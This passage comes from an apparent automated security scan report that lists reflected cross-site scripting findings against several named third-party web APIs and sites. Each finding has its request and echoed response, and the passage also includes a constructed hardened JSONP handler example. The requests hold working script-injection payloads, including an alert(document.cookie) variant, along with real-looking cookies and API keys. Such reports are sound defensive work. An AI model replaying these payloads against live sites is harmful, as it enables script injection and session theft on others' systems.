Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KbEYt9Gm0axhaj5XcunNcMDa7Re6IGD4lDrbCisip76D66Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRXq0x1X4kUBB3CBHNXcl3bEVUJBxdqAyDalXCEoKjwKKB7uI3cisSEIeS2mCWkomhIipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 02 Feb 2011 15:29:30 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 92
Connection: keep-alive

Unknown API key: (6332f8b7316a4d1284e9c1217a3673474d05c<script>alert(1)</script>0e5436c2494)

4.58. http://api.bizographics.com/v1/profile.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the callback request parameter is used without validation as the JSONP callback name and is emitted at the very start of the response body. The payload 33b74<script>alert(1)</script>22bbeb83d65 was submitted in the callback parameter and was echoed unmodified in the application's response.

The scanner describes this as a reflection into the HTML document between tags, but the response is served as Content-Type: application/json rather than text/html, with no X-Content-Type-Options header. Navigating to the URL directly executes the reflected <script> only in a browser that sniffs the JSON body as HTML. The more important point is that this is a JSONP endpoint consumed through a <script> element (the Referer shows the caller is fast.dm.demdex.net): its body is executed as JavaScript by whatever page includes it, so an endpoint that accepts an arbitrary callback string is a reusable script-injection gadget on the api.bizographics.com origin. The callback should be restricted to a strict identifier pattern (letters, digits, underscore, $ and dots) and the response should carry X-Content-Type-Options: nosniff.

Request

GET /v1/profile.json?api_key=6332f8b7316a4d1284e9c1217a367347&callback=Demdex.parseBizo33b74<script>alert(1)</script>22bbeb83d65 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://fast.dm.demdex.net/dm-dest.html?bizo=1&bizovalidttl=7&
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KbEYt9Gm0axhaj5XcunNcMDa7Re6IGD4lDrbCisip76D66Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRXq0x1X4kUBB3CBHNXcl3bEVUJBxdqAyDalXCEoKjwKKB7uI3cisSEIeS2mCWkomhIipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Wed, 02 Feb 2011 15:29:36 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KTissx4pIKRxvaj5XcunNcMDa7Re6IGD4lOuDZWVHyjN4Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtT8sOM0TiiisRAipIisFvtN4t4VEVUJBxdqAyBAisqZAs2SfkIE4k0isgs29d6PAF0Hy6gC0ipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 206
Connection: keep-alive

Demdex.parseBizo33b74<script>alert(1)</script>22bbeb83d65({"bizographics":{"industry":[{"code":"business_services","name":"Business Services"}],"location":{"code":"texas","name":"USA - Texas"}},"usage":1});

4.59. https://api.bizographics.com/v1/profile.json [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is echoed unmodified in the body of the application's 403 response, exactly as in 4.57 but over HTTPS. The payload af475<script>alert(1)</script>5b56c3fcd0c was submitted in the api_key parameter and appears verbatim in the "Unknown API key: (...)" error message.

The same caveat as 4.57 applies: the response is Content-Type: text/plain with no X-Content-Type-Options header, so the reflected <script> element is only rendered by a client that sniffs the plain-text body as HTML. The TLS transport changes nothing about the reflection itself, so this should be tracked together with 4.57 rather than as a separate High finding.

Request

GET /v1/profile.json?api_key=6332f8b7316a4d1284e9c1217a367347af475<script>alert(1)</script>5b56c3fcd0c&callback=Demdex.parseBizo HTTP/1.1
Host: api.bizographics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KRShFj6bKbiijaj5XcunNcMDa7Re6IGD4lLFCw41jWbyOAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtT8sOM0TiiisRAyMfy5dfAVhDEVUJBxdqAyAsVh4uYPLmIgwbisDgBSipgnUuNumFpPoipAipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 02 Feb 2011 16:18:36 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 92
Connection: Close

Unknown API key: (6332f8b7316a4d1284e9c1217a367347af475<script>alert(1)</script>5b56c3fcd0c)
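The following is an added example, not code from api.bizographics.com, of the server-side handling that would close the three findings above (4.57 to 4.59): a JSONP handler that accepts only a safe callback name, answers an unknown key without echoing it, and labels its responses so a browser will not sniff them as HTML. The route shape, KNOWN_KEYS, SAMPLE_PROFILE and the function names are hypothetical; the api_key and callback parameter names are the ones in the report.

```javascript
// Added example (not api.bizographics.com code): hardened JSONP handler.
// Key store, profile data and function names are hypothetical.

// Identifier, optionally dotted (e.g. Demdex.parseBizo). Brackets, quotes,
// angle brackets and whitespace cannot pass.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;

// Constructed stand-ins for the key store and the profile lookup.
const KNOWN_KEYS = new Set(['example-key-1']);
const SAMPLE_PROFILE = {
  bizographics: { industry: [{ code: 'business_services', name: 'Business Services' }] },
  usage: 1,
};

function isValidCallback(name) {
  return typeof name === 'string' && name.length <= 128 && CALLBACK_RE.test(name);
}

// query is the parsed query string; returns {status, headers, body}.
function handleProfileRequest(query) {
  const common = {
    'X-Content-Type-Options': 'nosniff', // no browser may sniff these bodies as HTML
    'Cache-Control': 'no-store',
  };
  if (!isValidCallback(query.callback)) {
    return {
      status: 400,
      headers: { ...common, 'Content-Type': 'text/plain; charset=utf-8' },
      body: 'Invalid callback parameter',
    };
  }
  if (!KNOWN_KEYS.has(query.api_key)) {
    // Reject without reflecting the key (4.57 and 4.59 echo it back verbatim).
    return {
      status: 403,
      headers: { ...common, 'Content-Type': 'text/plain; charset=utf-8' },
      body: 'Unknown API key',
    };
  }
  // The leading /**/ prevents the body from starting with the bytes of a valid
  // SWF file (the Rosetta Flash technique); JSON.stringify guarantees the
  // argument is a well-formed literal.
  const body = '/**/' + query.callback + '(' + JSON.stringify(SAMPLE_PROFILE) + ');';
  return {
    status: 200,
    headers: { ...common, 'Content-Type': 'application/javascript; charset=utf-8' },
    body,
  };
}

// Stand-alone demonstration with the callback name seen in the report.
console.log(handleProfileRequest({ api_key: 'example-key-1', callback: 'Demdex.parseBizo' }).body);
console.log(handleProfileRequest({ api_key: 'example-key-1', callback: 'Demdex.parseBizo33b74<script>alert(1)</script>22bbeb83d65' }));
```

The callback pattern deliberately allows dots so that the legitimate Demdex.parseBizo value keeps working; anything that would let the caller close the call or start a new statement is refused before any data is looked up.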

4.60. http://api.blogburst.com/EntityImageHandler.ashx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.blogburst.com
Path:   /EntityImageHandler.ashx

Issue detail

The value of REST URL parameter 1 is echoed unmodified in the "Error Path" line of the application's error response. The payload b4387(a)c27091d8173 was submitted in REST URL parameter 1, appended to /EntityImageHandler.ashx.

The scanner classified this as an unquoted JavaScript expression because the parenthesised probe was reflected intact, but the response is served with Content-Type: text/plain; charset=utf-8 and consists of an ASP.NET handler error message, not script. There is no JavaScript context to inject into, which is why the attempt to build a full proof of concept for arbitrary JavaScript did not succeed, and a browser that honours the declared type renders the body as text. What the response does reveal is the internal error-handler host name (psnapib, also present in the lower-case server header) and a custom error identifier, so this is better recorded as a verbose-error information leak together with an unvalidated reflection, to be confirmed manually.

Remediation detail

Because the response is plain text rather than script, the relevant fix is to stop echoing the requested path and the handler host name in error output (log them server-side instead) and to send X-Content-Type-Options: nosniff so that no browser sniffs the text/plain body as HTML. Echoing user-controllable data within a script context would be inherently dangerous, but no such context is present in the captured response.

Request

GET /EntityImageHandler.ashxb4387(a)c27091d8173 HTTP/1.1
Host: api.blogburst.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 16:18:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server: psnapib
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 201

Error handler problem:
Error Number: B8BUa0w7Ilp7zBNRYRdWMLni
Error Path: /EntityImageHandler.ashxb4387(a)c27091d8173
Error Message: No http handler was found for request type 'GET'
Error Host: psnapib

4.61. http://api.blogburst.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.blogburst.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 80c92(a)e7e03c35472 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico80c92(a)e7e03c35472 HTTP/1.1
Host: api.blogburst.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server: psnapib
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Date: Wed, 02 Feb 2011 19:10:36 GMT
Content-Length: 189

Error handler problem:
Error Number: B83sUW5V9btfzEZ9C74xOolh
Error Path: /favicon.ico80c92(a)e7e03c35472
Error Message: No http handler was found for request type 'GET'
Error Host: psnapib

4.62. http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.blogburst.com
Path:   /v1.0/WidgetDeliveryProxy.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f5c81(a)8b15d9b73ba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v1.0/WidgetDeliveryProxy.jsf5c81(a)8b15d9b73ba HTTP/1.1
Host: api.blogburst.com
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server: psnapib
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Date: Wed, 02 Feb 2011 15:32:08 GMT
Content-Length: 205

Error handler problem:
Error Number: B80iwlBCmlTpz5Pig5CAws6o
Error Path: /v1.0/WidgetDeliveryProxy.jsf5c81(a)8b15d9b73ba
Error Message: No http handler was found for request type 'GET'
Error Host: psnapib

4.63. http://api.blogburst.com/v1.0/WidgetDeliveryProxyStub.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.blogburst.com
Path:   /v1.0/WidgetDeliveryProxyStub.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e8e6e(a)55b1a46fc7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v1.0/WidgetDeliveryProxyStub.jse8e6e(a)55b1a46fc7 HTTP/1.1
Host: api.blogburst.com
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server: psnapib
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Date: Wed, 02 Feb 2011 15:32:19 GMT
Content-Length: 207

Error handler problem:
Error Number: B94M87SkpIdWCgjC0l2bFGg
Error Path: /v1.0/WidgetDeliveryProxyStub.jse8e6e(a)55b1a46fc7
Error Message: No http handler was found for request type 'GET'
Error Host: psnapib

4.64. http://api.blogburst.com/v1.0/WidgetDeliveryService.ashx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.blogburst.com
Path:   /v1.0/WidgetDeliveryService.ashx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f4506(a)4a5cdf0844b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v1.0f4506(a)4a5cdf0844b/WidgetDeliveryService.ashx?bbTransport=css&bbWidgetId=B7mDxwAeoI9czDO7YpXG1bi8&bbHostUrl=http%3A//www.ehow.com/computer-software/ HTTP/1.1
Host: api.blogburst.com
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server: psnapib
X-AspNet-Version: 2.0.50727
PluckOriginServer: psnapib
X-Compressed-By: HttpCompress
Date: Wed, 02 Feb 2011 15:32:36 GMT
Content-Length: 209

Error handler problem:
Error Number: B8WJgPc8mOdez6tZwoiCJoTl
Error Path: /v1.0f4506(a)4a5cdf0844b/WidgetDeliveryService.ashx
Error Message: No http handler was found for request type 'GET'
Error Host: psnapib

4.65. http://api.blogburst.com/v1.0/WidgetDeliveryService.ashx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.blogburst.com
Path:   /v1.0/WidgetDeliveryService.ashx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8b1dc(a)5a857af5c5d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v1.0/WidgetDeliveryService.ashx8b1dc(a)5a857af5c5d?bbTransport=css&bbWidgetId=B7mDxwAeoI9czDO7YpXG1bi8&bbHostUrl=http%3A//www.ehow.com/computer-software/ HTTP/1.1
Host: api.blogburst.com
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server: psnapib
X-AspNet-Version: 2.0.50727
PluckOriginServer: psnapib
X-Compressed-By: HttpCompress
Date: Wed, 02 Feb 2011 15:32:41 GMT
Content-Length: 208

Error handler problem:
Error Number: B7fOWSgosfbjAnIBtXULjlA
Error Path: /v1.0/WidgetDeliveryService.ashx8b1dc(a)5a857af5c5d
Error Message: No http handler was found for request type 'GET'
Error Host: psnapib

4.66. http://api.demandbase.com/api/v1/ip.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.demandbase.com
Path:   /api/v1/ip.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 5fda3<script>alert(1)</script>05613b280fe was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/v1/ip.json?token=9629e1a2b682d7afd8c9cc104ad125c08fa0b490&callback=demandbase_parse5fda3<script>alert(1)</script>05613b280fe HTTP/1.1
Host: api.demandbase.com
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/privacy/2o7?f=2o7
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Api-Version: v2
Content-Type: application/javascript;charset=utf-8
Date: Wed, 02 Feb 2011 19:10:46 GMT
Server: Apache
Status: 200
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
Connection: keep-alive
Content-Length: 94

demandbase_parse5fda3<script>alert(1)</script>05613b280fe({"isp":true,"ip":"173.193.214.243"})

4.67. http://apptools.com/examples/tableheight.php. [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptools.com
Path:   /examples/tableheight.php.

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 38302<script>alert(1)</script>c482f5e0c50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /examples38302<script>alert(1)</script>c482f5e0c50/tableheight.php. HTTP/1.1
Host: apptools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:18:40 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Length: 3788
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page
...[SNIP]...
<p>We're sorry, but your request for
http://apptools.com/examples38302<script>alert(1)</script>c482f5e0c50/tableheight.php was not able to be displayed.</p>
...[SNIP]...

4.68. http://apptools.com/examples/tableheight.php. [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptools.com
Path:   /examples/tableheight.php.

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c8e2a<script>alert(1)</script>5612df9d36a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /examples/tableheight.php.c8e2a<script>alert(1)</script>5612df9d36a HTTP/1.1
Host: apptools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:18:41 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Length: 3789
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page
...[SNIP]...
<p>We're sorry, but your request for
http://apptools.com/examples/tableheight.php.c8e2a<script>alert(1)</script>5612df9d36a was not able to be displayed.</p>
...[SNIP]...

4.69. http://apptools.com/examples/tableheight.php. [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptools.com
Path:   /examples/tableheight.php.

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 96edc<script>alert(1)</script>1447630590d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /examples/tableheight.php.?96edc<script>alert(1)</script>1447630590d=1 HTTP/1.1
Host: apptools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:18:40 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Length: 3792
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page
...[SNIP]...
<p>We're sorry, but your request for
http://apptools.com/examples/tableheight.php.?96edc<script>alert(1)</script>1447630590d=1 was not able to be displayed.</p>
...[SNIP]...

4.70. http://apptools.com/styles/apptools.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptools.com
Path:   /styles/apptools.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2523f<script>alert(1)</script>3ded236ecaa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /styles2523f<script>alert(1)</script>3ded236ecaa/apptools.css HTTP/1.1
Host: apptools.com
Proxy-Connection: keep-alive
Referer: http://apptools.com/examples38302%3Cscript%3Ealert(document.cookie)%3C/script%3Ec482f5e0c50/tableheight.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 20:26:31 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5125

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page
...[SNIP]...
<p>We're sorry, but your request for
http://apptools.com/styles2523f<script>alert(1)</script>3ded236ecaa/apptools.css was not able to be displayed.</p>
...[SNIP]...

4.71. http://apptools.com/styles/apptools.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptools.com
Path:   /styles/apptools.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e507e<script>alert(1)</script>60df3ed154 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /styles/apptools.csse507e<script>alert(1)</script>60df3ed154 HTTP/1.1
Host: apptools.com
Proxy-Connection: keep-alive
Referer: http://apptools.com/examples38302%3Cscript%3Ealert(document.cookie)%3C/script%3Ec482f5e0c50/tableheight.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 20:26:41 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5124

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page
...[SNIP]...
<p>We're sorry, but your request for
